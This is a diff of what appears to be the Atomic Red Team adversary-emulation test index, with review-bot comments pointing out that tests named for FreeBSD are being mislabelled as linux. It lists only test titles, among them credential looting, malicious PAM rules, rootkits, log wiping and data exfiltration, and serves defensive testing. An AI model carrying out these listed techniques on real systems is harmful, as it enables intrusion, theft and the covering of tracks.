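Review bot: T1016 Atomic Test #4 "System Network Configuration Discovery (freebsd)" changes to [linux], which makes it a near-duplicate of Test #3 (already [macos, linux]). Keep the freebsd tag so the index still distinguishes the two.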
@@ -2456,21 +2456,21 @@
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
|
||||
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
|
||||
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
|
||||
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
|
||||
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
|
||||
- Atomic Test #6: Launch DirLister Executable [windows]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #1: System Network Connections Discovery [windows]
|
||||
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #4: System Discovery using SharpView [windows]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
|
||||
- Atomic Test #1: AWS S3 Enumeration [iaas:aws]
|
||||
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1057 Process Discovery](../../T1057/T1057.md)
|
||||
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
|
||||
- Atomic Test #1: Process Discovery - ps [linux, macos]
|
||||
- Atomic Test #2: Process Discovery - tasklist [windows]
|
||||
- Atomic Test #3: Process Discovery - Get-Process [windows]
|
||||
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
|
||||
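Review bot: T1049 Atomic Test #3 is still titled "System Network Connections Discovery FreeBSD, Linux & MacOS" while its platforms become [linux, macos]; T1083 #3 and #4 and T1057 #1 lose freebsd the same way. If FreeBSD is no longer supported for these tests, the titles should say so; otherwise the tags should be reverted.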
@@ -2478,7 +2478,7 @@
|
||||
- Atomic Test #6: Discover Specific Process - tasklist [windows]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
|
||||
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
|
||||
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
|
||||
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
|
||||
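Review bot: T1069.001 Atomic Test #1 "Permission Groups Discovery (Local)" drops freebsd and is re-sorted to [linux, macos]; nothing in the hunk explains why the FreeBSD platform was removed, so please verify this against the test's supported_platforms.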
@@ -2487,7 +2487,7 @@
|
||||
- Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
|
||||
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
|
||||
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
|
||||
- Atomic Test #2: Examine password complexity policy - FreeBSD [freebsd]
|
||||
- Atomic Test #2: Examine password complexity policy - FreeBSD [linux]
|
||||
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux]
|
||||
- Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux]
|
||||
- Atomic Test #5: Examine password expiration policy - All Linux [linux]
|
||||
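Review bot: T1201 Atomic Test #2 "Examine password complexity policy - FreeBSD" is retagged [linux], but the Linux distributions are already covered by Tests #1, #3 and #4 (Ubuntu, CentOS/RHEL 7.x and 6.x). A FreeBSD-specific check listed under [linux] will either duplicate those or fail; keep it on [freebsd].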
@@ -2501,10 +2501,10 @@
|
||||
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
|
||||
- Atomic Test #1: Discover System Language by Registry Query [windows]
|
||||
- Atomic Test #2: Discover System Language with chcp [windows]
|
||||
- Atomic Test #3: Discover System Language with locale [freebsd, linux]
|
||||
- Atomic Test #3: Discover System Language with locale [linux]
|
||||
- Atomic Test #4: Discover System Language with localectl [linux]
|
||||
- Atomic Test #5: Discover System Language by locale file [linux]
|
||||
- Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux]
|
||||
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
|
||||
- [T1012 Query Registry](../../T1012/T1012.md)
|
||||
- Atomic Test #1: Query Registry [windows]
|
||||
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
|
||||
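Review bot: T1614.001 Atomic Tests #3 (locale) and #6 (environment variable query) go from [freebsd, linux] to [linux] with no change to the tests. Please confirm this is intentional rather than a dropped platform in the index generator.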
@@ -2515,7 +2515,7 @@
|
||||
- Atomic Test #2: Security Software Discovery - powershell [windows]
|
||||
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
|
||||
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
|
||||
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [freebsd]
|
||||
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
|
||||
- Atomic Test #6: Security Software Discovery - Sysmon Service [windows]
|
||||
- Atomic Test #7: Security Software Discovery - AV Discovery via WMI [windows]
|
||||
- Atomic Test #8: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows]
|
||||
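Review bot: T1518.001 Atomic Test #5 "Security Software Discovery - pgrep (FreeBSD)" is now [linux], directly below Test #4 "ps (Linux) [linux]"; the name and tag contradict each other. Restore [freebsd] on #5.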
@@ -2529,15 +2529,15 @@
|
||||
- Atomic Test #3: Remote System Discovery - nltest [windows]
|
||||
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
|
||||
- Atomic Test #5: Remote System Discovery - arp [windows]
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- Atomic Test #8: Remote System Discovery - nslookup [windows]
|
||||
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
|
||||
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
|
||||
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
|
||||
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
|
||||
- Atomic Test #13: Remote System Discovery - ip route [linux]
|
||||
- Atomic Test #14: Remote System Discovery - netstat [freebsd]
|
||||
- Atomic Test #14: Remote System Discovery - netstat [linux]
|
||||
- Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux]
|
||||
- Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
|
||||
- Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer [windows]
|
||||
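Review bot: T1018 Atomic Test #14 "Remote System Discovery - netstat" moves from [freebsd] to [linux], but the Linux equivalents in this technique are the iproute2 tests #12 (ip neighbour), #13 (ip route) and #15 (ip tcp_metrics) that sit in the same hunk; the netstat variant exists for FreeBSD. Tests #6 and #7 also lose freebsd without any change to the tests. Please revert these tags.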
@@ -2548,7 +2548,7 @@
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- Atomic Test #3: Port Scan Nmap for FreeBSD [freebsd]
|
||||
- Atomic Test #3: Port Scan Nmap for FreeBSD [linux]
|
||||
- Atomic Test #4: Port Scan NMap for Windows [windows]
|
||||
- Atomic Test #5: Port Scan using python [windows]
|
||||
- Atomic Test #6: WinPwn - spoolvulnscan [windows]
|
||||
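Review bot: T1046 Atomic Test #3 "Port Scan Nmap for FreeBSD" becomes [linux], making it redundant with Test #2 "Port Scan Nmap [linux, macos]". Keep the freebsd tag on #3.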
@@ -2569,7 +2569,7 @@
|
||||
- [T1124 System Time Discovery](../../T1124/T1124.md)
|
||||
- Atomic Test #1: System Time Discovery [windows]
|
||||
- Atomic Test #2: System Time Discovery - PowerShell [windows]
|
||||
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [freebsd, macos]
|
||||
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
|
||||
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
|
||||
- Atomic Test #5: System Time with Windows time Command [windows]
|
||||
|
||||
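Review bot: T1124 Atomic Test #3 "System Time Discovery in FreeBSD/macOS" is not just losing a platform here, it is substituted: [freebsd, macos] becomes [linux, macos], so the test gains a Linux claim that its name does not support. Please check the test YAML; if the test is really FreeBSD/macOS only, this tag is wrong.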
@@ -2699,10 +2699,10 @@
|
||||
- Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad]
|
||||
- Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad]
|
||||
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
|
||||
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #5: PureLocker Ransom Note [windows]
|
||||
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
|
||||
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
|
||||
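Review bot: T1486 Atomic Tests #1 through #4 are all titled "(FreeBSD/Linux)" yet drop to [linux]. Either rename the tests or restore the freebsd platform; the index should not advertise FreeBSD in the name and deny it in the tag.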
@@ -2712,11 +2712,11 @@
|
||||
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
|
||||
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1485 Data Destruction](../../T1485/T1485.md)
|
||||
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
|
||||
- Atomic Test #3: Overwrite deleted data on C drive [windows]
|
||||
- Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
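Review bot: T1496 Atomic Test #1 "FreeBSD/macOS/Linux - Simulate CPU Load with Yes" and T1485 Atomic Test #2 "FreeBSD/macOS/Linux - Overwrite file with DD" both keep FreeBSD in their names while their platforms shrink to [linux, macos]. Same name/tag mismatch as elsewhere in this merge; please reconcile.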
@@ -2736,14 +2736,14 @@
|
||||
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
|
||||
- Atomic Test #1: Shutdown System - Windows [windows]
|
||||
- Atomic Test #2: Restart System - Windows [windows]
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #7: Reboot System via `halt` - FreeBSD [freebsd]
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux]
|
||||
- Atomic Test #7: Reboot System via `halt` - FreeBSD [linux]
|
||||
- Atomic Test #8: Reboot System via `halt` - Linux [linux]
|
||||
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [freebsd]
|
||||
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
|
||||
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
|
||||
- Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
|
||||
- Atomic Test #12: Logoff System - Windows [windows]
|
||||
|
||||
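Review bot: T1529 Atomic Test #7 "Reboot System via `halt` - FreeBSD" and #10 "Reboot System via `poweroff` - FreeBSD" are retagged [linux], so they now collide with #8 "Reboot System via `halt` - Linux [linux]" and #11 "Reboot System via `poweroff` - Linux [linux]". Those pairs exist precisely because the BSD and Linux variants differ; with both halves under [linux] one of each pair is redundant and the FreeBSD one is mislabeled. Tests #3 through #6 and #9 lose freebsd the same way.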
@@ -2789,11 +2789,11 @@
|
||||
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
|
||||
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
|
||||
# exfiltration
|
||||
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
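Review bot: T1136.001 Atomic Tests #9, #11 and #13 are the FreeBSD counterparts of #8, #10 and #12 (create account, reactivate account, login as nobody) and each is now tagged [linux], which gives the index two identical-platform tests per action. Restore [freebsd] on the FreeBSD-named entries.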
@@ -2807,12 +2807,12 @@
|
||||
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
|
||||
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
|
||||
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
|
||||
- Atomic Test #1: C2 Data Exfiltration [windows]
|
||||
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- Atomic Test #3: DNSExfiltration (doh) [windows]
|
||||
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
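Review bot: T1048.002 Atomic Test #2 still says "freebsd,linux or macos" in its name while dropping to [macos, linux], and T1048 Tests #1 and #2 lose freebsd the same way. Note the platform order is preserved here ([macos, linux, freebsd] to [macos, linux]) whereas earlier hunks re-sort the list, so this does not look like a single uniform regeneration; each affected test's supported_platforms should be checked individually.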
@@ -2821,18 +2821,18 @@
|
||||
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
|
||||
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
|
||||
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
|
||||
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
|
||||
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux]
|
||||
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
|
||||
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
|
||||
- Atomic Test #6: MAZE FTP Upload [windows]
|
||||
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
|
||||
- Atomic Test #8: Python3 http.server [linux]
|
||||
- Atomic Test #9: Python3 http.server (freebsd) [freebsd]
|
||||
- Atomic Test #9: Python3 http.server (freebsd) [linux]
|
||||
|
||||
|
||||
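Review bot: T1048.003 Atomic Test #9 "Python3 http.server (freebsd)" becomes [linux] and now duplicates Test #8 "Python3 http.server [linux]"; T1030 #1 and T1048.003 #1 and #3 lose freebsd without a change to the tests. Please revert the freebsd tags, or drop the FreeBSD-suffixed duplicates if FreeBSD support is being removed on purpose.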
@@ -5,20 +5,24 @@
|
||||
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
|
||||
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
|
||||
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
|
||||
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
|
||||
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
|
||||
- Atomic Test #10: chflags - Remove immutable file attribute [linux]
|
||||
- Atomic Test #11: Chmod through c script [macos, linux]
|
||||
- Atomic Test #12: Chmod through c script (freebsd) [linux]
|
||||
- Atomic Test #13: Chown through c script [macos, linux]
|
||||
- Atomic Test #14: Chown through c script (freebsd) [linux]
|
||||
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1014 Rootkit](../../T1014/T1014.md)
|
||||
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
|
||||
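Review bot: T1556.003 Atomic Test #2 "Malicious PAM rule (freebsd)" enters this index as [linux], and T1222.002 Tests #1 through #4 and #7 drop freebsd while Tests #12 and #14 "(freebsd)" are likewise listed under [linux]. The visible context makes the problem concrete: Test #10 "chflags - Remove immutable file attribute [linux]" names a BSD/macOS utility whose Linux equivalent is chattr (Test #9), so a [linux] tag there cannot be right. The hunk header shows four lines added; if those are the FreeBSD entries being pulled into this index because their platform was rewritten, that is a generator bug, not new Linux coverage.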
@@ -28,17 +32,26 @@
|
||||
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
|
||||
- Atomic Test #1: Sudo usage [macos, linux]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [linux]
|
||||
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
|
||||
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
|
||||
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
|
||||
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
|
||||
- Atomic Test #1: rm -rf [macos, linux]
|
||||
- Atomic Test #2: rm -rf [linux]
|
||||
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
|
||||
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
|
||||
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
|
||||
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
|
||||
- Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux]
|
||||
- Atomic Test #19: Overwrite Linux Mail Spool [linux]
|
||||
- Atomic Test #20: Overwrite Linux Log [linux]
|
||||
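Review bot: T1548.003 Atomic Tests #2, #4 and #6, all suffixed "(freebsd)", appear here as [linux] beside their Linux/macOS originals #1, #3 and #5, and T1070.002 gains "(freebsd)" entries (#5, #7, #10, #13) under [linux] as well. The header (-28,17 +32,26) shows nine lines added, consistent with FreeBSD-only tests being swept into this index by the platform rewrite rather than by any new Linux tests. Also T1036.005 #1 drops freebsd while its name is unchanged. Please confirm the intent before merging.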
@@ -47,19 +60,28 @@
|
||||
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
|
||||
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
|
||||
- Atomic Test #2: Clear sh history (rm) [linux]
|
||||
- Atomic Test #3: Clear Bash history (echo) [linux]
|
||||
- Atomic Test #4: Clear sh history (echo) [linux]
|
||||
- Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
|
||||
- Atomic Test #6: Clear sh history (cat dev/null) [linux]
|
||||
- Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
|
||||
- Atomic Test #8: Clear sh history (ln dev/null) [linux]
|
||||
- Atomic Test #9: Clear Bash history (truncate) [linux]
|
||||
- Atomic Test #10: Clear sh history (truncate) [linux]
|
||||
- Atomic Test #11: Clear history of a bunch of shells [linux, macos]
|
||||
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
|
||||
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
|
||||
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
|
||||
- Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
|
||||
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
|
||||
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
|
||||
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
|
||||
- Atomic Test #3: Base64 decoding with Python [linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
|
||||
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
|
||||
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
|
||||
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
|
||||
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
|
||||
- [T1562 Impair Defenses](../../T1562/T1562.md)
|
||||
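Review bot: T1140 Atomic Test #7 "FreeBSD b64encode Shebang in CLI" is listed as [linux], but b64encode is a FreeBSD utility, not something a stock Linux install provides (coreutils ships base64, which Test #9 uses); Test #6 "(freebsd)" has the same problem, and #3, #4 and #8 drop freebsd outright. The T1070.003 block likewise now carries every "Clear sh history" variant and #12 and #16 "(freebsd)" under [linux]. Same root cause as the rest of this merge; please fix the platform tags rather than accept the index as generated.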
@@ -73,18 +95,20 @@
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
